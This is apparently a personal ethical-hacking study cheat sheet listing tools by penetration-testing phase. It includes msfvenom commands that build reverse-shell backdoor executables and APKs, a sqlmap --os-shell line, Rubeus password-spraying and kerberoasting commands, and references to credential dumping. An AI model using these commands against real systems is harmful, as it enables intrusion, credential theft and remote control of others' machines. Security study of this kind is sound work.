Ethical Hacking Tools 💻~( _ ~)

Recoinnaissance - Intelligence gathering

Footprinting

• sublist3r
• Netcraft.com
• pentest-tools.com
• Intelius, pipl, BeenVerified, Whitepages, and PeekYou are pages for people searching on social networking
• theharvester, it is an open-source intelligence tool to perform enumeration on LinkedIn and other websites
• Shodan
• Censys
• sherlock.py is a project to footprint social networking sites
• telnet
• Burb suite, Zaproxy, WhatWeb, BuiltWith, Wappalyzer
• Web data extractor and parsehub are web spiders that are oriented to collect information on the target website
• HTTrack Web Site Copier, and NCollector Studio allow us to download a website to a local directory
• Octoparse, netpeark Spider, and Link Extractor, these tools extract linked things from the target website
• CeWL tool gather a list of words from the target website
• Foca, Metagoofil, Exiftool, and Web Data Extractor are tools for extracting metadata and hidden information
• WebSite-Watcher and VisualPing allowed us to detect changes or updates in a target website
• Web-Stat, Alexa, and Monitis to collect information about the target company's website traffic (ex. total visitors, page views, among others).
• eMailTrackerPro, Infoga, and Mailtrack are email tracking tools
• DNSdumpster.com, Bluto, and Domain Dossier are pages to extract DNS information
• dnsrecon is a tool for doing reverse DNS Lookup
• traceroute (linux), tracert (win), tcptraceroute, Path Analyzer Pro, VisualRoute, Traceroute NG, and PingPlotter
• Maltego
• Recon-ng is a web reconnaissance framework
• OSRFramework
• Recon-Dog
• BillCipher
• The3Inspector, Raccoon, Orb, PENTMENU

Scanning

Network scanning refers to a set of procedures used for identifying hosts, ports, and services in a network. It is important to mention that the scanning methodologies are based on doing vertical (services) or horizontal analysis (the devices).

Directory

• gobuster

Files

• gobuster, gobuster dir -uhttp://example.com -w wordlist.txt -x php,txt,html

• hping2/hping3 is a commmand line networking scanning and packet crafting tool. https://diarium.usal.es/pmgallardo/2020/10/16/hping3-syntax/

NMAP

The nework mapper

Scripts

• nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <IP to analyze> ... enumerates the shares of NetBios

• nmap --script firewall --traceroute <objective> ... passing a firewall and scanning an objetive

• nmap --script banner <objective> ... banner grabbing

• nmap -sI <IP zombie> <objective> ... zombie scanning

• `nmap -sP / ... ping sweep

• metasploit

• NetScanToolsPro

• Unicorscan

• SolarWinds Port Scanner

• PRTG Network Monitor

• OmniPeek Network Protocol Analyzer

Ping Sweep

• Angry IP Scanner
• Colasoft
• Visual Ping Tester
• OpUtils

For Mobile

• IP Scanner, for iOS scans
• Fing, iOS and Android
• Network Scanner, it is an Android app

Wordpress Security Scanner

• wpscan
• N-Stalker

Web Server Reconnaissance

• Skipfish

Footprinting a Web Server

• httpprecon, banner grabbing windows tool
• ID Serve, banner grabbing windows tool

Fingerprinting

• uniscan

Analysis and reports

• OWASP Zap
• Vega
• Acunetix Web Vulnerability Scanner (WVS) - Windows tool

Enumeration

Windows

• Global Network Inventory (GNI)
• Ipscan25.exe
• SuperScan 4.1
• Hyena
• NetBIOS enumerator
• nmap Scripting Engine (NSE)
• PowerView.ps1 |-> using the last program started we can use the next commands
  • Get-NeUser | select cn, enumerate the users
  • Get-NetGroup -GroupName *admin* domain groups of admins
  • https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
  • Get-NetComputer -fulldata | select operatingsystem
  • Invoke-ShareFinder
  • Get-NetUser
• mimikatz.exe, is a post-exploitation tool for dumping user credentials inside of an active directory network
• nbstat is a Windows utility for the local and remote computers

Enumerating User Acccounts

• PsExec is a lightweight Telnet replacement that can execute processes on other systems.

Enumerating Shared Resources

• Net view is a command-line that displays a list of computers in a specified workgroup

Simple Network Management Protocol (SNMP) Enumeration

• OpUtils (https://www.manageengine.com) and Network Performance Monitor (https://www.solarwinds.com).
• Snmpcheck
• SoftPerfect Network Scanner
• Network Performance Monitor (https://www.solarwinds.com)
• OpUtils (https://www.manageengine.com)
• PRTG Network Monitor (https://www.paessler.com)
• Engineer’s Toolset (https://www.solarwinds.com)

Lightweight Directory Access Protocol (LDA) Protocol

• Softerra LDAP Administrator provides tools for LDAP development, deployment, and administration of directories.
• LDAP Admin Tool https://www.ldapsoft.com
• LDAP Account Manager https://www.ldap-account-manager.org
• LDAP Search https://securityxploded.com
• JXplorer http://www.jxplorer.org
• Active Directory Explorer (AD Explorer) https://docs.microsoft.com

Network Time Protocol (NTP) Enumeration

• ntptrace traces a chain of NTP servers back to the primary source
• ntpdc
• ntpq
• ntpdate
• PRTG network monitor
• Nmap, wireshark, up-proto-scanner, and NTP Server Scanner

Network File System (NFS) Enumeration

• RPCScan Source: https://github.com
• SuperEnum Source: https://github.com

Simple Mail Transfer Protocol Enumeration

SMTP servers respond differently to VRFY, EXPN, and RCPT TO commands for valid and invalid users. Some tools are Metasploit, Nmap, NetScanTools Pro, and smtp-user-enum to collect a list of valid users, delivery addresses, message recipients, etc.

DNS Enumeration Using Zone Transfer

• nslookup, dig, and DNSRecon; if DNS transfer setting is enabled on the target name server, it will provide DNS information, or else it will return an error saying it has failed or refuses the zone transfer

DNS Cache Snooping

• Attackers perform DNS cache snooping using various tools such as the dig command, DNS Snoop Dogg, and DNSRecon.

DNSSec Zone Walking

• Attackers use tools, such as LDNS and DNSRecon, to exploit this vulnerability and obtain the network information of a target domain and further launch Internet-based attack

IPsec Enumeration

• nmap
• ike-scan, it discovers IKE hosts and can fingerprint them using the retransmission backoff pattern

VoIP Enumeration

• Svmap and metasploit

Remote Procedure Call (RPC) Enumeration

• nmap
• NetScanTools Pro

Telnet Enumeration

• nmap

Server Message Block (SMB) Enumeration

• Nmap, SMBMap, enum4linux, nullinux, and NetScanTool Pro

FTP and Trivial File Transfer Protocol (TFTP) Enumeration

• nmap, metasploit, PortQry

IPv6 Enumeration

• Enyx and IPv6 Hackit,

Border Gateway Protocol (BGP) Enumeration

• Nmap and BGP Toolkit

Linux

• LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
• LinEnum: https://github.com/rebootuser/LinEnum
• LES (Linux Exploit Suggester): https://github.com/mzet-/linux-exploit-suggester
• Linux Smart Enumeration: https://github.com/diego-treitos/linux-smart-enumeration
• Linux Priv Checker: https://github.com/linted/linuxprivchecker

• Bloodhound / SharpHound

Resources for Vulnerability Research

• Microsoft Vulnerability Research (MSVR)
• Dark Reading
• SecurityTracker
• Trend Micro
• Security Magazine
• PenTest Magazine
• SC Magazine
• Exploit Database
• SecurityFocus
• Help Net Security
• HackerStorm
• Computerworld

Vulnerability Analysis

• Qualys - license
• Nessus - license
• Nikto, it is an open-source web server scanner
• GFI Languard
• OpenVAS
• Qualys FreeScan
• Acunetix Web Vulnerability Scanner
• ManageEngine Vulnerability Manager Plus
• Microsoft Baseline Security Analyzer (MBSA)

Vulnerability Assessment Tools for Mobile

• Vulners Scanner
• Security Metrics Mobile

Malware

Virus

Virus Maker

• JPS Virus Maker 3.0
• Internet Worm Maker Thing

Malware Analysis Tools

Static

Dissasembling and Debugging Tools

• IDA
• OllyDog is a debugger for binary code analysis when the source code is not available

Dynamic

Registry Monitoring Tools

• regshot, is an interesting tool that allows us to compare the changes in registry entries after installing/uninstalling a program

Port Monitoring Tools

• TCP View
• CurrPorts

Anti-Virus Software

• ClamWin

Windows Startup Programs Monitoring Tools

• Autoruns
• WinPatrol

Registry Monitoring Tools

• jv16 Power Tools

Password Cracking Tools

Windows

• pwdump7, it is a useful tool to get the password hashes from a Security Account Manager (SAM) // we need administrator privileges
• L0phtCrack, is a tool designed to audit passwords and recover applications
• ophcrack is a Windows password cracker based on rainbow tables. It comes with a Graphical User Interface and runs on multiple platforms
• CertUtil and File-Hash commands that allow us to retrieve various checksums of files
• Mimikatz (https://github.com)
• Powershell Empire (https://github.com)
• DSInternals PowerShell (https://github.com)
• Ntdsxtract (https://github.com)
• Kebrute is a tool to brute force discovery users, password, and even password spray from Kerberos (the authentication service from Active Directory)
• Rubeus is a powerful tool for attacking Kerberos
  • Rubeus.exe harvest /interval:30 this command harvests for TGTs every 30 seconds
  • Rubeus.exe brute /password:Password1 /noticket sprays password
  • Rubeus.exe kerberoast Kerberoasting

LLMNR/NBT-NS Spoofing Tool

• Responder

Pass the Ticket Attack

• Mimikatz, Rubeus, and Windows Credentials Editor

Linux

• John
• hydra

Online Tools to Search Default Passwords

• https://www.fortypoundhead.com
• https://cirt.net
• http://www.defaultpassword.us
• http://defaultpasswords.in
• https://www.routerpasswords.com
• https://default-password.info

Password Recovery Tools

• Password Recovery Toolkit https://accessdata.com
• Passware Kit Forensic https://www.passware.com
• hashcat https://hashcat.net
• Windows Password Recovery Tool https://www.windowspasswordsrecovery.com
• PCUnlocker https://www.top-password.com

Tools to Detect LLMNR/NBT-NS Poisoning

• Vindicate
• got-responded

Buffer Overflow Detection Tools

• OllyDbg
• Flawfinder (https://dwheeler.com)
• Kiuwan (https://www.kiuwan.com)
• Splint (https://github.com)
• BOVSTT (https://github.com)

Privilege Escalation

• Using Spectre and Meltdown vulnerabilities; these are vulnerabilities found in the design of modern processor chips.

  • Spectre, explote speculative execution to read restricted data. Get information
  • Meltdown, access out-of-bounds memoryu by exploiting CPU optimization mechanisms such as speculative execution. Escalate privileges

• Using Named Pipe Impersonation through Metasploit

• Find SUID find / -perm -u=s -type f 2>/dev/null

• Find GUID find / -perm -g=s -type f 2>/dev/null

• BeRoot, it checks common misconfigurations

• linpostexp, it obtains detailed information on the kernel

• Windows Exploit Suggester

Using DLL Hijacking

• Roober and PowerSploit

Using Dylib Hijacking

• Dylib Hijack Scanner and DylibHijack, for OS X

Tools for Defending Against DLL and Dylib Hijacking

• Dependency Walker, DLL Hijack Audit Kit, and DLLSpy

Tools for Detecting Spectre and Meltdown Vulnerabilities

• InSpectre, Spectre & Meltdown Checker, INTEL-SA-00075 Detection and Mitigation Tool, etc

Tools for Executing Apps

• RemoteExec https://www.isdecisions.com
• Pupy https://github.com
• PDQ Deploy https://www.pdq.com
• Dameware Remote Support https://www.dameware.com
• ManageEngine Desktop Central https://www.manageengine.com
• PsExec https://docs.microsoft.com

Cryptography

MD5 Hash Calculator

• HashTool (windows tool)

Decypher

• hashid, it a useful tool to know that is the algorithm that was used to generate the hash

Malware

Trojans

Remote Access Trojans (RAT)

• njRAT
• Theef

Sniffing Tools

• Wireshark
• Colasoft Capsa (license), it is an interesting tool with descriptive information and some visualizations of a network data capture
• Cain & Abel (Windows tool), it's a password recovery tool that we can perform MITM attacks, for example using ARP poisoning

Spoofing Detection Tools

• XArp is a security application that detects ARP-based attacks

Spoofing MAC Address

• SMAC (Windows - License)

Social Engineering Tools

• The Social Engineering Toolkit (SET), it's an open-source Python driven tool, it has utilities to make spear-phishing attacks, website attacks, and among others.

DoS & DDoS

• metasploit
• hping3
• High Orbit Ion Cannon (HOIC), is network stress and DoS/DDoS attack application that sends HTTP POST and GET requests at a computer target

Stego Analysis

• binwalk
• steghide, it one of the most famous steganography tools, but only it processes jpg files
• zteg, it is a perfect tool to process different kinds of data, especially that are png files
• Stegoveritas, it supports a lot of image files.
• sonicvisualizer,

exiftool is a tool that allows us to check the metadata of any image file

Detection Tools

• WAF00F - Web Application Firewall (WAF) Detection Tool

IDS

• SNORT

HoneyPots

Medium

• HoneyBOT, it a useful honeypot for network security research or as part of an IDS defensive solution

Bypassing Network Defensive Mechanisms

• HTTPort, is a tool that implements HTTP/FTP tunneling

Databases

• SQLMap:
  • `sqlmap -r --tamper=space2comment --dump-all --dbms sqlite
  • sqlmap -u “<URL to attack>” --cookie=<”cookie copied”> --dbs
  • sqlmap -u “<URL to attack>” --cookie=<””> --os-shell

Metasploit

Msfvenom allows us to access all payloads available in the Metasploit framework., moreover, it brings us the opportunity to create other payloads.

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.10.11 -f exe > Desktop/Backdoor.exe

msfvenom -p php/meterpreter/reverse_tcp lhost=<ip_host> lport=4444 -f raw

use exploit/multi/handler

msfvenom -l

msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.10.11 R > Desktop/Backdoor.apk

searchsploit linux kernel 4.8.0

searchsploit -m <code>

run post/multi/recon/local_exploit_suggester

Wireless Networks

• Aircrack-ng

Cryptography

• HashCalc, calculating One-Way Hashes
• CryptoForge, it is a tool that allows us to encrypt things using strong encryption algorithms.
• BCTextEncoder is a way for encoding and decoding text data.
• VeraCypt is a tool that used for on-the-fly encryption (OTFE), it can create virtual encrypted disk within a file.
• CryptTool allows for applying cryptographic mechanisms

Censorship Circumvention Tools

• Alkasir is a cross-platform, open-source, and robust website censorship circumvention tool
• Tails is a live operating system that a user can start on any computer using a peripheral device

Anonymizers

• Whonix is a desktop operating system for security and privacy
• Psiphon is a software that allows anyone to surft the Internet through a secure proxy

Anonymizers for Mobile

• Orbot is a proxy ap, it uses Tor to encrypt Internet traffic and then hides it
• Psiphon uses VPN, SSH, and HTTP proxy technology that allow us to access open and uncensored Internet content.
• OpenDoor is an iPhone and iPad app

Network Discovery and Mapping Toool

• Network Topology Mapper, from https://www.solarwinds.co
• OpManager (https://www.manageengine.com)
• The Dude (https://www.mikrotik.com)
• NetSurveyor (http://nutsaboutnets.com)
• NetBrain (https://www.netbraintech.com)
• Spiceworks Network Mapping Tool (https://www.spiceworks.com)

Network Discovery Tools for Mobile

• Scany, (iPhone and iPad) http://happymagenta.com
• Network Analyzer Source: https://play.google.com
• PortDroid Network Analysis Source: https://play.google.com

Yara

• LOKI is a free open-source IOC (Indicator of Compromise) scanner created/written by Florian Roth.
• THOR Lite is Florian's newest multi-platform IOC AND YARA scanner.
• FENRIR
• YAYA was created by the EFF (Electronic Frontier Foundation) and released in September 2020.
• Valhalla (a web solution) https://www.nextron-systems.com/valhalla/

Other tools

• Impacket is a set of tools that will give us to apply Github